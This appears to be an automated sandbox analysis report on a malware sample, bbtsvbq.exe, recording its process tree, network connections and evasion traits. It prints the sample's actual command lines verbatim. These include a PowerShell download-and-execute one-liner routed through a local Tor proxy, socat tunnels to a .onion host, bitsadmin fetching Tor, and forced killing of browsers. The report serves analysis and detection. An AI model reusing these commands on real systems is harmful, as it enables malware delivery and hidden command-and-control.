Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
Queries process information (via WMI, Win32_Process)
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iexplore.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Reads ini files
Source: C:\Users\user\Desktop\bbtsvbq.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\bbtsvbq.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)
Source: bbtsvbq.exe | Virustotal: hash found
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\bbtsvbq.exe 'C:\Users\user\Desktop\bbtsvbq.exe'
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -ep Unrestricted -f 'C:\ProgramData\C4CqRww6.ps1' | find /v '' >> 'C:\Users\user~1\AppData\Local\Temp\user-PC.log'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\ProgramData\C4CqRww6.ps1'
Source: unknown | Process created: C:\Windows\System32\find.exe find /v ''
Source: unknown | Process created: C:\ProgramData\7za.exe 'C:\ProgramData\7za.exe' x -o'C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ' -y 'C:\Users\user~1\AppData\Local\Temp\QKB6w.zip'
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /b /c bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: unknown | Process created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: unknown | Process created: C:\ProgramData\7za.exe 'C:\ProgramData\7za.exe' x -o'C:\ProgramData\VitBTKxRu' -y 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: unknown | Process created: C:\Windows\System32\taskeng.exe taskeng.exe {7FB8942A-D520-4069-87A1-8D11961A18B0} S-1-5-21-312302014-279660585-3511680526-1005:user-PC\user:Interactive:[1]
Source: unknown | Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('tor.exe',0,False))
Source: unknown | Process created: C:\ProgramData\VitBTKxRu\Tor\tor.exe 'C:\ProgramData\VitBTKxRu\Tor\tor.exe'
Source: unknown | Process created: C:\ProgramData\7za.exe 'C:\ProgramData\7za.exe' x -o'C:\ProgramData\VitBTKxRu' -y 'C:\Users\user~1\AppData\Local\Temp\sX7raTm2LP.zip'
Source: unknown | Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:80,socksport=9050',0,False))
Source: unknown | Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:5588,socksport=9050',0,False))
Source: unknown | Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('powershell.exe ''$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.Download'+'String('http://api.ipify.org/'),$F);& $F''',0,False))
Source: unknown | Process created: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe 'C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe' tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:5588,socksport=9050
Source: unknown | Process created: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe 'C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe' tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:80,socksport=9050
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' '$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.DownloadString('http://api.ipify.org/'),$F);& $F'
Source: unknown | Process created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im iexplore.exe
Source: unknown | Process created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im firefox.exe
Source: unknown | Process created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im chrome.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1' | find /v '' >> 'C:\Users\user~1\AppData\Local\Temp\user-PC.log'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1'
Source: unknown | Process created: C:\Windows\System32\find.exe find /v ''
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\9kehql3e.cmdline'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES8E7D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC8E0E.tmp'
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\U5f96EAq.ps1' | find /v '' >> 'C:\Users\user~1\AppData\Local\Temp\user-PC.log'
Source: C:\Users\user\Desktop\bbtsvbq.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -ep Unrestricted -f 'C:\ProgramData\C4CqRww6.ps1' | find /v '' >> 'C:\Users\user~1\AppData\Local\Temp\user-PC.log'
Source: C:\Users\user\Desktop\bbtsvbq.exe | Process created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im iexplore.exe
Source: C:\Users\user\Desktop\bbtsvbq.exe | Process created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im firefox.exe
Source: C:\Users\user\Desktop\bbtsvbq.exe | Process created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im chrome.exe
Source: C:\Users\user\Desktop\bbtsvbq.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1' | find /v '' >> 'C:\Users\user~1\AppData\Local\Temp\user-PC.log'
Source: C:\Users\user\Desktop\bbtsvbq.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\U5f96EAq.ps1' | find /v '' >> 'C:\Users\user~1\AppData\Local\Temp\user-PC.log'
Source: C:\Users\user\Desktop\bbtsvbq.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\ProgramData\C4CqRww6.ps1'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /v ''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\ProgramData\7za.exe 'C:\ProgramData\7za.exe' x -o'C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ' -y 'C:\Users\user~1\AppData\Local\Temp\QKB6w.zip'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /b /c bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\ProgramData\7za.exe 'C:\ProgramData\7za.exe' x -o'C:\ProgramData\VitBTKxRu' -y 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\ProgramData\7za.exe 'C:\ProgramData\7za.exe' x -o'C:\ProgramData\VitBTKxRu' -y 'C:\Users\user~1\AppData\Local\Temp\sX7raTm2LP.zip'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('tor.exe',0,False))
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:80,socksport=9050',0,False))
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:5588,socksport=9050',0,False))
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('powershell.exe ''$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.Download'+'String('http://api.ipify.org/'),$F);& $F''',0,False))
Source: C:\Windows\System32\taskeng.exe | Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe | Process created: C:\ProgramData\VitBTKxRu\Tor\tor.exe 'C:\ProgramData\VitBTKxRu\Tor\tor.exe'
Source: C:\Windows\System32\mshta.exe | Process created: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe 'C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe' tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:80,socksport=9050
Source: C:\Windows\System32\mshta.exe | Process created: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe 'C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe' tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:5588,socksport=9050
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' '$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.DownloadString('http://api.ipify.org/'),$F);& $F'
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /v ''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\9kehql3e.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES8E7D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC8E0E.tmp'
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\bbtsvbq.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Contains functionality to communicate with device drivers
Source: C:\ProgramData\7za.exe | Code function: 6_2_0040BACB: DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,6_2_0040BACB
Creates mutexes
Source: C:\Users\user\Desktop\bbtsvbq.exe | Mutant created: \Sessions\1\BaseNamedObjects\brtirxtTEexrxt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Found potential string decryption / allocating functions
Source: C:\ProgramData\7za.exe | Code function: String function: 00407A18 appears 180 times
Source: C:\ProgramData\7za.exeCode function: String function: 0046B890 appears 624 times
PE file does not import any functionsShow sources
Source: 9kehql3e.dll.35.drStatic PE information: No import functions for PE file found
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version infoShow sources
Source: bbtsvbq.exeBinary or memory string: OriginalFilenamewship6.dll.muij% vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenamewshom.ocx vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenamewshtcpip.dll.muij% vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: System.OriginalFileName vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenameMSXML3R.dllX vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenamescrrun.dllV vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: originalfilename vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenamemsado15.dllj% vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenameKernelbasej% vs bbtsvbq.exe
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 104.20.73.28 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 212.51.156.17 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 89.45.235.21 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 192.30.253.112 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 192.30.253.121 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 174.129.241.106 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 93.184.221.200 443
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\7za.exe

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: bbtsvbq.exe, taskeng.exe | Binary or memory string: Progman
Source: bbtsvbq.exe, taskeng.exe | Binary or memory string: Program Manager
Source: bbtsvbq.exe, taskeng.exe | Binary or memory string: Shell_TrayWnd
Uses taskkill to terminate processes
Source: C:\Users\user\Desktop\bbtsvbq.exe | Process created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im iexplore.exe
Source: C:\Users\user\Desktop\bbtsvbq.exe | Process created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im firefox.exe
Source: C:\Users\user\Desktop\bbtsvbq.exe | Process created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im chrome.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('powershell.exe ''$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.Download'+'String('http://api.ipify.org/'),$F);& $F''',0,False))
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('powershell.exe ''$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.Download'+'String('http://api.ipify.org/'),$F);& $F''',0,False))
Found C# or VB.Net code to silently install a certificate (suppress security dialog)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\9kehql3e.0.cs

Anti Debugging:

Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\bbtsvbq.exe | Code function: 1_2_013B1CBB SetUnhandledExceptionFilter,1_2_013B1CBB
Source: C:\Users\user\Desktop\bbtsvbq.exe | Code function: 1_2_013B1B6D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_013B1B6D
Source: C:\Users\user\Desktop\bbtsvbq.exe | Code function: 1_2_013B1A4A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_013B1A4A
Source: C:\Users\user\Desktop\bbtsvbq.exe | Code function: 1_2_013B4743 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_013B4743
Source: C:\ProgramData\7za.exe | Code function: 6_2_0046E6AA SetUnhandledExceptionFilter,6_2_0046E6AA
Source: C:\ProgramData\7za.exe | Code function: 6_2_0046E6BC SetUnhandledExceptionFilter,6_2_0046E6BC
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\bbtsvbq.exe | System information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\bbtsvbq.exe | Code function: 1_2_013B1B6D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_013B1B6D
Contains functionality to dynamically determine API calls
Source: C:\ProgramData\7za.exe | Code function: 6_2_00471C24 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00471C24
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\bbtsvbq.exe | Code function: 1_2_013B4D30 mov eax, dword ptr fs:[00000030h] 1_2_013B4D30
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\bbtsvbq.exe | Code function: 1_2_013B7B23 GetProcessHeap,1_2_013B7B23
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe | Process token adjusted: Debug
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\bbtsvbq.exe | Code function: 1_2_013B6ECA FindFirstFileExA,1_2_013B6ECA
Source: C:\ProgramData\7za.exe | Code function: 6_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,6_2_0040B174
Source: C:\ProgramData\7za.exe | Code function: 6_2_0040B6E9 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,6_2_0040B6E9
Contains functionality to query system information
Source: C:\ProgramData\7za.exe | Code function: 6_2_0040C5F4 GetSystemInfo,6_2_0040C5F4
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: cached-microdescs.new.13.dr | Binary or memory string: ntor-onion-key 3N4WrVMCiVfr4fi9YWJA59/qb8YGTKvg8zeFsIE7MDU=
Source: unverified-microdesc-consensus.tmp.13.dr, cached-microdesc-consensus.tmp.13.dr | Binary or memory string: m LSAkc0pvTGWqeMUm+vxtmYkwt7JvgTfHo62w9+0O/F8
Source: cached-microdescs.new.13.dr | Binary or memory string: ntor-onion-key 85TobZi987xjVa4vMcIk4U2MCo7WxesUm8fD0zOJpG0=
Source: tor.exe, cached-microdescs.new.13.dr | Binary or memory string: MIGJAoGBAMeJpSyO1qlPpDXtW27+ieynz3Z+qEmudMH9du0aYBrjqcbYPPt/xsFd
Source: cached-microdescs.new.13.dr | Binary or memory string: id ed25519 oBcWh18xyuWrMnRfRQEMUl6fxGEBpOQPVBqsQRTgWN0
Source: cached-microdescs.new.13.dr | Binary or memory string: id ed25519 vA9zbcE+2YhiQRkUAt5LvMCijbpUW4Op15qrMlKqy+s
Program exit points
Source: C:\Users\user\Desktop\bbtsvbq.exe | API call chain: ExitProcess graph end node graph_1-8207
Source: C:\Users\user\Desktop\bbtsvbq.exe | API call chain: ExitProcess graph end node graph_1-6729
Source: C:\ProgramData\7za.exe | API call chain: ExitProcess graph end node graph_6-55276
Source: C:\ProgramData\7za.exe | API call chain: ExitProcess graph end node graph_6-55277
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Found dropped PE file which has not been started or loaded
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exe | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\it\Microsoft.Win32.TaskScheduler.resources.dll
